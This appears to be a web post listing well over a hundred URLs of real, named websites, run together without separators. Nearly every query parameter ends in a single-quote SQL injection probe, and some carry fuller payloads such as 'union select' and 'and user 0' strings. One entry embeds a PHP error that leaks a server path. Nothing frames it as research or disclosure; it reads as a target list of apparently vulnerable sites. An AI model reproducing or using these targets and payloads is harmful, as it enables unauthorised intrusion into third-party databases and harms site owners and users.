www.blamm.com/top10.php?id='8http://housemouseantics.com/php/top10.php?what='14021http://www.zubial.fr/top10.php?lang2='2http://www.persianawards.com/awards-top10.php?award='Music&cat='Poet%20and%20Lyricshttp://www.zubial.pt/top10.php?lang2='2http://housemouseantics.com/php/top10.php?what='14075http://www.persianawards.com/awards-top10.php?award='Literature&cat='Fictionhttp://www.poblanerias.com/clasificados/clasificados-top10.php?cat='5http://www.kamera-digital.com/artikel/top10.php?ArtID='2http://www.diamondmailer.de/top10.php?ref='daredevil13http://www.goldensword.net/historialeer.php?num='44http://www.goldensword.net/historialeer.php?num='22http://www.ruedelimmobilier.com/reagir.php?article='1789http://www.istnf.fr/site/minisite/reagir.php?numsite='23&page='94&fiche='4367http://www.gwelan.net/fcj/news/reagir.php?newsID='13http://gwelan.info/fcj/news/reagir.php?newsID='49http://www.istnf.fr/site/Themes/reagir.php?fiche='3796http://www.gwelan.fr/fcj/news/reagir.php?newsID='36http://gwelan.info/fcj/news/reagir.php?newsID='35http://www.bdtheque.com/forum_bds.php?subjectid='33121&num='1http://www.enghiong.com/library/forum_bds+php%27inurlcar+sport%27+and+0='1+union+selecthttp://www.biclopsgames.com/game.php?id='1http://www.splashworks.com/game.php?id='49http://www.allgame.com/game.php?id='73257http://www.operationsports.com/game.php?id='670http://www.operationsports.com/game.php?id='665http://www.yougame.com/game.php?id='5392http://www.tabloidgames.com/game.php?id='9http://www.gamesinaflash.com/game.php?id='35http://www.codeglue.com/game.php?id='1http://percypea.co.uk/game.php?id='3d%20buggy%20racing&type='featuredhttp://www.mappn.com/game.php?id='9http://www.allgame.com/game.php?id='11686http://www.brainmelt.com/game.php?id='8http://www.gamesinaflash.com/game.php?id='48http://www.mappn.com/game.php?id='11http://www.dosgraveyard.com/game.php?id='108http://www.vizzed.com/vizzedboard/retro/game.php?id='2405http://www.bratzgamestoplay.info/games/game.php?id='21http://www.chrisandsam.com/games/game.php?id='406http://www.tru3d.com/products/view_product.php?id='30389http://www.accutronics.co.uk/pages/view_product.php?id='4http://www.kidsarefunk.com/view_product.php?id='53http://www.liquidlines.co.uk/view_product.php?c_id='5&sc_id='34&p_id='2023&PHPSESSID='24353b6ce50e3eb28de493fb...http://www.precisionbiologic.com/products/view_product.php?id='20http://handybg.com/view_product.php?id='771http://www.handy.rs/en/view_product.php?id='1865http://ct-srv3.aegean.gr/aggelopoulos/newsone.php?id='Mjk='&lng='Z3JlZWs='http://gulfbusinessinformation.com/view_product.php?id='27http://www.hotfile123.com/index.php?q='datedick+com+news+newsone+php+id+and+1+2+and+user+0http://www.pt.ncku.edu.tw/newsone.php?newSno='36http://www.theoangelopoulos.gr/newsone.php?id='Mjg='&lng='ZW5nbGlzaA='='http://www.hotfile123.com/index.php?q='datedick+com+news+newsone+php+id+and+1+2http://www.barracuda.gr/newsone.php?id='35http://www.theoangelopoulos.gr/newsone.php?id='NDU='&lng='Z3JlZWs='http://www.archdioceseofcolombo.com/news.php?id='851http://eggblog.net/news.php?id='39http://www.indiepubgames.com/news.php?id='2http://www.itmaasia.com/news.php?id='1http://www.sotatoys.com/news.php?id='51http://www.sinatrafamily.com/news/news.php?id='0http://www.flipskateboards.com/news.php?id='175http://www.cloudveil.com/company/news.php?id='63http://www.fourcty.org/news.php?id='39&p='7http://www.anope.org/news.php?id='57http://en.apa.az/news.php?id='122212http://www.rhinossoccer.com/news.php?id='1233http://newsrod.com/avd_start.php?avd='-2http://www.worldmusicinstitute.org/event.php?id='906http://www.forumforhinduawakening.org/events/event.php?id='81http://www.wordtheatre.com/events/event.php?id='115http://www.hertsshow.com/event.php?id='19&page='showgroundeventshttp://www.indiajournal.com/pages/event.php?id='11753http://www.globalalliancepr.org/event.php?id='8http://www.polkatheatre.com/event.php?id='1http://www.visitogunquit.org/event.php?id='21http://www.musikcafeen.dk/event.php?id='930&e='PROTOTYBE:%20NEIL%20LANDSTRUMM%20(PLANET%20MU/UK)%20+%20DJ%20J%27ESP%C3%89RE%20+%20PROTOTYBE%20DJ%27Shttp://www.springfieldpccc.com/event.php?id='224http://www.worldmusicinstitute.org/event.php?id='466http://www.kkfi.org/event.php?id='815http://www.wordtheatre.com/events/event.php?id='122http://www.visitogunquit.org/event.php?id='20http://www.musikcafeen.dk/event.php?id='937http://www.nscurl.com/portal/event.php?id='1http://www.kkfi.org/event.php?id='870http://www.polkatheatre.com/event.php?id='25http://www.artsadmin.co.uk/events/event.php?id='512http://www.thelizardlounge.com/event.php?id='1446http://www.hotfile123.com/index.php?q='dirthy+product+item+php+id+and+user+0+and+user+0+product+item+php+idhttp://www.iesaa.com/root/Product-Item.php?id='6416&catid='276http://www.iesaa.com/root/Product-Item.php?id='6338http://www.schmittspiele.de/spiele/sql.php?id='30http://www.odesk.com/users/ASP-Net-SQL-PHP-SQL-Developer-Team-Leader_~~4c4d651209aa000a?sid='12001http://www.odesk.com/users/UJHAA-Services-ASP-Net-SQL-PHP-MySQL-Data-Entry_~~ae5c9677b99dcb88?sid='48002&recent='no&tot='5984&pos='4995http://newsrod.com/sql.php?id='1%27http://www.mairie-tierce.fr/index2.php?srubrique='%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20index:%20%20Champs%20in%20%3Cb%3E/var/www/vhosts/mairie-tierce.fr/httpdocs/lib/base/SQL.php%3C/b%3E%20on%20line%20%3Cb%3E150%3C/b%3E%3Cbr%20/%3E%3Cbr%20http://www.ufwda.org/news_view.php?id='165http://www.mondopop.it/news_view.php?id='38http://www.citcochandigarh.com/news_view.php?id='4http://www.dbxpro.com/news_view.php?id='25http://www.comprousa.com/en/news_view.php?id='8http://www.ufwda.org/news_view.php?id='175http://www.paintballxxl.com/news_view.php?id='1348http://ccet.nctu.edu.tw/news_view.php?id='43http://www.sjzbus.com.cn/news_view.php?id='356&cateid='16http://www.jfsmithassociates.com/news_view.php?id='10http://ccet.nctu.edu.tw/news_view.php?id='45http://www.5hchina.com/news_view.php?id='6703http://www.motortribe.it/speedday/news_view.php?ID='43http://www.samick.co.kr/eng/news/news_view.php?code='news&id='30http://www.eggheadcafe.com/searchform.aspx?search='id+identify+user+user+identify+sql+php+how+http://www.cectelecom.com/en/news/news_view.php?id='439http://www.motortribe.it/news_view.php?ID='3868http://www.tamtammilano.it/portal/news_view.php?ID='10568http://www.chinalegends.com/news_view.php?id='107http://www.farmer.bg/news_view.php?id='22051http://www.saosaosao.com/news_view.php?id='47http://www.lebanque.it/news_view.php?ID='25http://biblioteca-ua.com/select_biblio.php?id='1599http://kupa.pl/pl/humor.php?id='16http://www.litoralmania.com.br/humor.php?id='49http://www.gbritain.net/humor.php?id='2http://www.estaentodo.com/humor/humor.php?id='578&numero='10http://forum.ms.agh.edu.pl/humor.php?kat='3&metoda='czas&kolejnosc='DESChttp://www.otnako.supik.info/humor.php?id='30http://forum.ms.agh.edu.pl/humor.php?id='259http://www.saberdetudo.com.br/humor.php?id='480http://www.estaentodo.com/humor/humor.php?id='582&numero='7http://www.ginnyblack.yoyo.pl/humor.php?id='1http://infokorupsi.com/id/humor.php?ac='4&l='mantra-sakti-ajian-untuk-korupsihttp://www.climb.com.ua/aboutbook.php?id='12http://familynewsabout.com/aboutBook.php?id='3241http://www.partenaire-plus.com/fiche_spectacle.php?cat='spectacle&idcat='1&id='20http://www.frontnational.com/communique_detail.php?id='1956http://www.fn-franchecomte.com/communique_detail.php?id='100http://www.fn-languedocroussillon.com/communique_detail.php?id='122http://www.echtenamen.de/kategorie.php4?id='3http://www.suchbiene.de/kategorie.php4?id='1199http://www.suchbiene.de/kategorie.php4?id='870http://www.php-crawler.de/befehle/kategorie.php4?kategorie='Sessionshttp://www.torry.net/news.php?id='26http://www.bigdance2010.com/news.php?id='94http://www.aoecs.org/news/news.php?id='52

»» READMORE...